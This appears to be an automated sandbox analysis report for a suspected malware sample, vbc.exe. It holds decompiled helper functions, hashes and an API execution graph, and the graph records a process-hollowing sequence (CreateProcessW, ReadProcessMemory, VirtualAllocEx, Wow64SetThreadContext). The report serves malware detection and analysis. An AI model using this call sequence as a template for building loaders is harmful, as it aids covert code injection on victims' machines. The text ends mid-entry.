                          • Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040560C Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0040560C(CHAR* _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t8 = _a4;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E004055A3(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








                          0x00405615
                          0x0040561c
                          0x0040561f
                          0x00405624
                          0x00405637
                          0x00405651
                          0x00000000
                          0x00405651
                          0x0040563b
                          0x0040563c
                          0x0040563f
                          0x00405640
                          0x00405648
                          0x00000000
                          0x00000000
                          0x0040564a
                          0x0040564d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040564d
                          0x00000000
                          0x0040562d
                          0x00000000
                          0x0040562e

                          APIs
                          • CharNextA.USER32(004053BE), ref: 0040561A
                          • CharNextA.USER32(00000000), ref: 0040561F
                          • CharNextA.USER32(00000000), ref: 0040562E
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: CharNext
                          • String ID: C:\
                          • API String ID: 3213498283-3404278061
                          • Opcode ID: 823a6b04a944e09c4ec49499f0146cce19f7af5e9ff0db91097355eacddc88c5
                          • Instruction ID: 8d77621b7085ccb429820eca4f781d68bcfd126ff613cd56e481de53d81d286f
                          • Opcode Fuzzy Hash: 823a6b04a944e09c4ec49499f0146cce19f7af5e9ff0db91097355eacddc88c5
                          • Instruction Fuzzy Hash: EAF02752A84A202AEB2232680C54B2B579CCBA5750F444C33E244B62D1C2BD4C838FEA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00401D1B Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                          Download Yara Rule
                          C-Code - Quality: 67%
                          			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
				 *0x40af7c = E004029CB(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af83 = 1;
				 *0x40af80 = _t11 & 0x00000001;
				 *0x40af81 = _t11 & 0x00000002;
				 *0x40af82 = _t11 & 0x00000004;
				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af6c);
				_push(_t14);
				_push(_t26);
				E004059E3();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                          0x00401d29
                          0x00401d42
                          0x00401d4c
                          0x00401d51
                          0x00401d5c
                          0x00401d63
                          0x00401d75
                          0x00401d7b
                          0x00401d80
                          0x00401d8a
                          0x004024aa
                          0x00401561
                          0x00402825
                          0x00402880
                          0x0040288c

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: CapsCreateDeviceFontIndirect
                          • String ID:
                          • API String ID: 3272661963-0
                          • Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                          • Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
                          • Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                          • Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404D73 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420480 != _t22) {
							 *0x420480 = _t22;
							E00405A85(0x420498, 0x424000);
							E004059E3(0x424000, _t22);
							E0040140B(6);
							E00405A85(0x424000, 0x420498);
						}
						L11:
						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004046F2(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403E83(0x413);
				return 0;
			}




                          0x00404d7f
                          0x00404da4
                          0x00404dc4
                          0x00404dc7
                          0x00404dca
                          0x00404de1
                          0x00404de7
                          0x00404dee
                          0x00404df5
                          0x00404dfc
                          0x00404e01
                          0x00404e07
                          0x00000000
                          0x00404e17
                          0x00404db1
                          0x00404e04
                          0x00404e04
                          0x00000000
                          0x00404e04
                          0x00404dbd
                          0x00404dbf
                          0x00000000
                          0x00404dbf
                          0x00404d85
                          0x00000000
                          0x00000000
                          0x00404d8c
                          0x00000000

                          APIs
                          • IsWindowVisible.USER32(?), ref: 00404DA9
                          • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404E17
                            • Part of subcall function 00403E83: SendMessageA.USER32 ref: 00403E95
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Window$CallMessageProcSendVisible
                          • String ID:
                          • API String ID: 3748168415-3916222277
                          • Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                          • Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
                          • Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                          • Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004055BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004055BF(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                          0x004055c0
                          0x004055ca
                          0x004055cc
                          0x004055d3
                          0x004055db
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004055db
                          0x004055dd
                          0x004055e2

                          APIs
                          • lstrlenA.KERNEL32(80000000,C:\Users\Public,00402CC7,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 004055C5
                          • CharPrevA.USER32(80000000,00000000), ref: 004055D3
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: CharPrevlstrlen
                          • String ID: C:\Users\Public
                          • API String ID: 2709904686-2272764151
                          • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                          • Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
                          • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                          • Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004056D1 Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004056D1(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                          0x004056dd
                          0x004056df
                          0x00405707
                          0x004056ec
                          0x004056f1
                          0x004056fc
                          0x00000000
                          0x00405719
                          0x00405705
                          0x00405705
                          0x00000000

                          APIs
                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                          • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
                          • CharNextA.USER32(00000000), ref: 004056FF
                          • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: lstrlen$CharNextlstrcmpi
                          • String ID:
                          • API String ID: 190613189-0
                          • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                          • Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
                          • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                          • Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:6.7%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:4.4%
                          Total number of Nodes:1503
                          Total number of Limit Nodes:40
                          execution_graph 7416 8b66c8 7419 8b66d9 7416->7419 7420 8b0791 _LocaleUpdate::_LocaleUpdate 58 API calls 7419->7420 7421 8b66d5 7420->7421 7746 8b180c 7747 8b183e EnterCriticalSection 7746->7747 7748 8b181c 7746->7748 7750 8b1834 7747->7750 7748->7747 7749 8b1824 7748->7749 7751 8b0189 __lock 58 API calls 7749->7751 7751->7750 7752 8b350c IsProcessorFeaturePresent 7753 8b3532 7752->7753 7422 8a38c0 7423 8aed8c 7422->7423 7424 8aede8 __initptd LeaveCriticalSection 7423->7424 7425 8aedaa 7424->7425 7426 8b0189 __lock 58 API calls 7425->7426 7427 8aedb1 ___addlocaleref 7426->7427 7428 8aedf1 __initptd LeaveCriticalSection 7427->7428 7429 8aeddc __mtinitlocknum 7428->7429 7430 8a2ac1 7431 8b2600 7430->7431 7432 8b2610 7431->7432 7433 8b0308 _free 58 API calls 7431->7433 7434 8b2622 7432->7434 7435 8b0308 _free 58 API calls 7432->7435 7433->7432 7436 8b2634 7434->7436 7438 8b0308 _free 58 API calls 7434->7438 7435->7434 7437 8b2646 7436->7437 7439 8b0308 _free 58 API calls 7436->7439 7438->7436 7439->7437 7754 8b0d00 7762 8b0853 7754->7762 7757 8b1cfb ___crtMessageBoxW 6 API calls 7759 8b0ee7 7757->7759 7758 8b0d6e IsValidCodePage 7760 8b0d80 GetCPInfo 7758->7760 7761 8b0d24 _memset setSBCS __setmbcp_nolock 7758->7761 7760->7761 7761->7757 7763 8b0791 _LocaleUpdate::_LocaleUpdate 58 API calls 7762->7763 7764 8b0863 7763->7764 7765 8b0872 GetOEMCP 7764->7765 7766 8b0884 7764->7766 7767 8b089b 7765->7767 7766->7767 7768 8b0889 GetACP 7766->7768 7767->7758 7767->7761 7768->7767 7769 8b3200 RtlUnwind 6875 1207dd 6887 1206c7 GetPEB 6875->6887 6877 120842 6878 12095b CreateFileW 6877->6878 6879 120982 6878->6879 6880 120980 6878->6880 6879->6880 6881 120995 VirtualAlloc 6879->6881 6881->6880 6882 1209af ReadFile 6881->6882 6882->6880 6883 1209c7 CloseHandle 6882->6883 6884 1209d8 6883->6884 6888 120d07 6884->6888 6887->6877 6902 1206c7 GetPEB 6888->6902 6890 120d5e 6891 120e49 6890->6891 6893 120e56 6890->6893 6901 1209e3 ExitProcess 6890->6901 6903 12102f 6891->6903 6893->6901 6924 120267 6893->6924 6895 120f5c 6896 120fc9 6895->6896 6897 120267 11 API calls 6895->6897 6895->6901 6898 120267 11 API calls 6896->6898 6897->6895 6899 120fe8 6898->6899 6899->6901 6933 1201b6 6899->6933 6902->6890 6942 1206c7 GetPEB 6903->6942 6905 12103d 6906 12116b CreateProcessW 6905->6906 6923 121146 6905->6923 6907 121182 6906->6907 6906->6923 6908 1211a5 ReadProcessMemory 6907->6908 6907->6923 6909 1211c9 6908->6909 6908->6923 6910 1211fc VirtualAllocEx 6909->6910 6943 120368 6909->6943 6911 121226 6910->6911 6910->6923 6913 120267 11 API calls 6911->6913 6915 12123c 6913->6915 6914 1211f0 6914->6910 6914->6923 6916 121296 6915->6916 6918 120267 11 API calls 6915->6918 6915->6923 6917 120267 11 API calls 6916->6917 6919 1212b0 6917->6919 6918->6915 6920 1212b9 Wow64SetThreadContext 6919->6920 6919->6923 6921 1212de 6920->6921 6920->6923 6922 1201b6 11 API calls 6921->6922 6922->6923 6923->6901 6925 120282 6924->6925 6926 120706 GetPEB 6925->6926 6927 1202a3 6926->6927 6928 120335 6927->6928 6929 1202ab 6927->6929 6977 120180 6928->6977 6931 120402 10 API calls 6929->6931 6932 12031c 6931->6932 6932->6895 6934 1201d1 6933->6934 6935 120706 GetPEB 6934->6935 6936 1201f2 6935->6936 6937 1201f6 6936->6937 6938 12023c 6936->6938 6939 120402 10 API calls 6937->6939 6980 120192 6938->6980 6941 120231 6939->6941 6941->6901 6942->6905 6944 12037b 6943->6944 6952 120706 GetPEB 6944->6952 6946 12039c 6947 1203a0 6946->6947 6948 1203e6 6946->6948 6954 120402 GetPEB 6947->6954 6968 1201a4 6948->6968 6951 1203db 6951->6914 6953 120729 6952->6953 6953->6946 6955 120467 6954->6955 6971 120744 GetPEB 6955->6971 6958 1204ec 6959 1204fd VirtualAlloc 6958->6959 6964 1205c2 6958->6964 6960 120513 ReadFile 6959->6960 6959->6964 6961 120528 VirtualAlloc 6960->6961 6960->6964 6961->6964 6965 120549 6961->6965 6962 120600 VirtualFree 6963 12060b 6962->6963 6963->6951 6964->6962 6964->6963 6965->6964 6966 1205b1 CloseHandle 6965->6966 6967 1205b5 VirtualFree 6965->6967 6966->6967 6967->6964 6969 120402 10 API calls 6968->6969 6970 1201ae 6969->6970 6970->6951 6972 120757 6971->6972 6974 1204db CreateFileW 6972->6974 6975 120616 GetPEB 6972->6975 6974->6958 6974->6964 6976 120641 6975->6976 6976->6972 6978 120402 10 API calls 6977->6978 6979 12018a 6978->6979 6979->6932 6981 120402 10 API calls 6980->6981 6982 12019c 6981->6982 6982->6941 8041 8b6759 8044 8b6771 8041->8044 8045 8b679b 8044->8045 8046 8b6782 8044->8046 8059 8b4a87 8045->8059 8050 8b49f9 8046->8050 8049 8b676c 8051 8b0791 _LocaleUpdate::_LocaleUpdate 58 API calls 8050->8051 8052 8b4a1d 8051->8052 8062 8b5634 8052->8062 8056 8b4a42 8057 8b1cfb ___crtMessageBoxW 6 API calls 8056->8057 8058 8b4a83 8057->8058 8058->8049 8075 8b4955 8059->8075 8063 8b567c 8062->8063 8069 8b568c ___mtold12 8062->8069 8064 8b10b7 __mtinitlocknum 58 API calls 8063->8064 8065 8b5681 8064->8065 8066 8b1048 __fptostr 9 API calls 8065->8066 8066->8069 8067 8b1cfb ___crtMessageBoxW 6 API calls 8068 8b4a35 8067->8068 8070 8b4b50 8068->8070 8069->8067 8074 8b4ba8 8070->8074 8071 8b4d00 8071->8056 8072 8b1cfb ___crtMessageBoxW 6 API calls 8073 8b50be 8072->8073 8073->8056 8074->8071 8074->8072 8076 8b0791 _LocaleUpdate::_LocaleUpdate 58 API calls 8075->8076 8077 8b4982 8076->8077 8078 8b5634 ___strgtold12_l 58 API calls 8077->8078 8079 8b499a 8078->8079 8084 8b50c2 8079->8084 8081 8b49b7 8082 8b1cfb ___crtMessageBoxW 6 API calls 8081->8082 8083 8b49f5 8082->8083 8083->8049 8087 8b5103 8084->8087 8085 8b1cfb ___crtMessageBoxW 6 API calls 8086 8b5630 8085->8086 8086->8081 8087->8085 8088 8b5289 8087->8088 8088->8081 7450 8a31d9 7453 8b5a55 7450->7453 7451 8b1cfb ___crtMessageBoxW 6 API calls 7452 8b5da8 7451->7452 7453->7451 7454 8b5ddc 7457 8b5dfd 7454->7457 7456 8b5df8 7458 8b5e08 7457->7458 7459 8b5e67 7457->7459 7458->7459 7461 8b5e0d 7458->7461 7525 8b634e 7459->7525 7463 8b5e2b 7461->7463 7464 8b5e12 7461->7464 7462 8b5e4c 7462->7456 7465 8b5e4e 7463->7465 7468 8b5e35 7463->7468 7471 8b6508 7464->7471 7512 8b5e83 7465->7512 7490 8b65c9 7468->7490 7542 8b75cf 7471->7542 7474 8b654d 7477 8b6565 7474->7477 7478 8b6555 7474->7478 7475 8b653d 7476 8b10b7 __mtinitlocknum 58 API calls 7475->7476 7479 8b6542 7476->7479 7554 8b7457 7477->7554 7480 8b10b7 __mtinitlocknum 58 API calls 7478->7480 7482 8b1048 __fptostr 9 API calls 7479->7482 7483 8b655a 7480->7483 7486 8b6549 7482->7486 7484 8b1048 __fptostr 9 API calls 7483->7484 7484->7486 7485 8b6598 7485->7486 7563 8b641c 7485->7563 7488 8b1cfb ___crtMessageBoxW 6 API calls 7486->7488 7489 8b5e26 7488->7489 7489->7456 7491 8b75cf __fltout2 58 API calls 7490->7491 7492 8b65f7 7491->7492 7493 8b65fe 7492->7493 7494 8b6611 7492->7494 7497 8b10b7 __mtinitlocknum 58 API calls 7493->7497 7495 8b6619 7494->7495 7496 8b662c 7494->7496 7498 8b10b7 __mtinitlocknum 58 API calls 7495->7498 7501 8b7457 __fptostr 58 API calls 7496->7501 7499 8b6603 7497->7499 7500 8b661e 7498->7500 7502 8b1048 __fptostr 9 API calls 7499->7502 7503 8b1048 __fptostr 9 API calls 7500->7503 7504 8b6658 7501->7504 7505 8b660a 7502->7505 7503->7505 7504->7505 7507 8b669e 7504->7507 7510 8b6678 7504->7510 7506 8b1cfb ___crtMessageBoxW 6 API calls 7505->7506 7509 8b66c4 7506->7509 7593 8b61fd 7507->7593 7509->7462 7511 8b641c __cftof2_l 58 API calls 7510->7511 7511->7505 7513 8b0791 _LocaleUpdate::_LocaleUpdate 58 API calls 7512->7513 7514 8b5ea8 7513->7514 7515 8b5ebf 7514->7515 7516 8b5ec8 7514->7516 7517 8b10b7 __mtinitlocknum 58 API calls 7515->7517 7519 8b5ed1 7516->7519 7522 8b5ee5 7516->7522 7518 8b5ec4 7517->7518 7521 8b1048 __fptostr 9 API calls 7518->7521 7520 8b10b7 __mtinitlocknum 58 API calls 7519->7520 7520->7518 7524 8b5ee0 _memset __alldvrm __cftoa_l _strrchr 7521->7524 7522->7524 7625 8b61df 7522->7625 7524->7462 7526 8b75cf __fltout2 58 API calls 7525->7526 7527 8b6380 7526->7527 7528 8b6397 7527->7528 7529 8b6387 7527->7529 7530 8b63a8 7528->7530 7531 8b639e 7528->7531 7532 8b10b7 __mtinitlocknum 58 API calls 7529->7532 7536 8b7457 __fptostr 58 API calls 7530->7536 7533 8b10b7 __mtinitlocknum 58 API calls 7531->7533 7534 8b638c 7532->7534 7533->7534 7535 8b1048 __fptostr 9 API calls 7534->7535 7537 8b6393 7535->7537 7538 8b63e8 7536->7538 7539 8b1cfb ___crtMessageBoxW 6 API calls 7537->7539 7538->7537 7540 8b61fd __cftoe2_l 58 API calls 7538->7540 7541 8b6418 7539->7541 7540->7537 7541->7462 7543 8b75f8 ___dtold 7542->7543 7570 8b786d 7543->7570 7545 8b7613 7584 8b6c6d 7545->7584 7548 8b763a 7550 8b1cfb ___crtMessageBoxW 6 API calls 7548->7550 7549 8b7650 7551 8b1058 __invoke_watson 8 API calls 7549->7551 7552 8b6536 7550->7552 7553 8b765c 7551->7553 7552->7474 7552->7475 7555 8b7469 7554->7555 7556 8b747f 7554->7556 7557 8b10b7 __mtinitlocknum 58 API calls 7555->7557 7556->7555 7559 8b7485 7556->7559 7558 8b746e 7557->7558 7560 8b1048 __fptostr 9 API calls 7558->7560 7561 8b10b7 __mtinitlocknum 58 API calls 7559->7561 7562 8b7478 _memmove _strlen 7559->7562 7560->7562 7561->7558 7562->7485 7564 8b0791 _LocaleUpdate::_LocaleUpdate 58 API calls 7563->7564 7565 8b6439 7564->7565 7566 8b10b7 __mtinitlocknum 58 API calls 7565->7566 7569 8b6455 _memset __shift 7565->7569 7567 8b644b 7566->7567 7568 8b1048 __fptostr 9 API calls 7567->7568 7568->7569 7569->7486 7573 8b78c2 7570->7573 7571 8b7934 7574 8b6c6d __fltout2 58 API calls 7571->7574 7572 8b1cfb ___crtMessageBoxW 6 API calls 7575 8b81f7 7572->7575 7573->7571 7577 8b794d 7573->7577 7583 8b78d4 7573->7583 7576 8b796c 7574->7576 7575->7545 7578 8b8234 7576->7578 7576->7583 7580 8b6c6d __fltout2 58 API calls 7577->7580 7579 8b1058 __invoke_watson 8 API calls 7578->7579 7581 8b8240 7579->7581 7580->7576 7582 8b8209 7582->7545 7583->7572 7583->7582 7585 8b6c78 7584->7585 7587 8b6c86 7584->7587 7585->7587 7591 8b6c9c 7585->7591 7586 8b10b7 __mtinitlocknum 58 API calls 7588 8b6c8d 7586->7588 7587->7586 7589 8b1048 __fptostr 9 API calls 7588->7589 7590 8b6c97 7589->7590 7590->7548 7590->7549 7591->7590 7592 8b10b7 __mtinitlocknum 58 API calls 7591->7592 7592->7588 7594 8b0791 _LocaleUpdate::_LocaleUpdate 58 API calls 7593->7594 7595 8b6210 7594->7595 7596 8b621d 7595->7596 7597 8b6226 7595->7597 7598 8b10b7 __mtinitlocknum 58 API calls 7596->7598 7600 8b623b 7597->7600 7603 8b624f __shift 7597->7603 7599 8b6222 7598->7599 7602 8b1048 __fptostr 9 API calls 7599->7602 7601 8b10b7 __mtinitlocknum 58 API calls 7600->7601 7601->7599 7610 8b624a _memmove 7602->7610 7604 8b6c6d __fltout2 58 API calls 7603->7604 7605 8b62c6 7604->7605 7606 8b1058 __invoke_watson 8 API calls 7605->7606 7605->7610 7607 8b634d 7606->7607 7608 8b75cf __fltout2 58 API calls 7607->7608 7609 8b6380 7608->7609 7611 8b6397 7609->7611 7612 8b6387 7609->7612 7610->7505 7613 8b63a8 7611->7613 7614 8b639e 7611->7614 7615 8b10b7 __mtinitlocknum 58 API calls 7612->7615 7619 8b7457 __fptostr 58 API calls 7613->7619 7616 8b10b7 __mtinitlocknum 58 API calls 7614->7616 7617 8b638c 7615->7617 7616->7617 7618 8b1048 __fptostr 9 API calls 7617->7618 7620 8b6393 7618->7620 7621 8b63e8 7619->7621 7622 8b1cfb ___crtMessageBoxW 6 API calls 7620->7622 7621->7620 7623 8b61fd __cftoe2_l 58 API calls 7621->7623 7624 8b6418 7622->7624 7623->7620 7624->7505 7626 8b634e __cftoe_l 58 API calls 7625->7626 7627 8b61f8 7626->7627 7627->7524 7775 8b4211 7776 8b4220 7775->7776 7777 8b4234 7775->7777 7778 8b10b7 __mtinitlocknum 58 API calls 7776->7778 7784 8b4230 7777->7784 7791 8b30a2 7777->7791 7779 8b4225 7778->7779 7781 8b1048 __fptostr 9 API calls 7779->7781 7781->7784 7787 8b424e 7808 8b46da 7787->7808 7789 8b4254 7789->7784 7790 8b0308 _free 58 API calls 7789->7790 7790->7784 7792 8b30b5 7791->7792 7796 8b30d9 7791->7796 7793 8b2fe4 __fclose_nolock 58 API calls 7792->7793 7792->7796 7794 8b30d2 7793->7794 7834 8b38bd 7794->7834 7797 8b484f 7796->7797 7798 8b4248 7797->7798 7799 8b485c 7797->7799 7801 8b2fe4 7798->7801 7799->7798 7800 8b0308 _free 58 API calls 7799->7800 7800->7798 7802 8b2fee 7801->7802 7803 8b3003 7801->7803 7804 8b10b7 __mtinitlocknum 58 API calls 7802->7804 7803->7787 7805 8b2ff3 7804->7805 7806 8b1048 __fptostr 9 API calls 7805->7806 7807 8b2ffe 7806->7807 7807->7787 7809 8b46e6 __mtinitlocknum 7808->7809 7810 8b470a 7809->7810 7811 8b46f3 7809->7811 7812 8b4795 7810->7812 7814 8b471a 7810->7814 7813 8b1083 __commit 58 API calls 7811->7813 7815 8b1083 __commit 58 API calls 7812->7815 7816 8b46f8 7813->7816 7817 8b4738 7814->7817 7818 8b4742 7814->7818 7819 8b473d 7815->7819 7820 8b10b7 __mtinitlocknum 58 API calls 7816->7820 7821 8b1083 __commit 58 API calls 7817->7821 7822 8b432b ___lock_fhandle 59 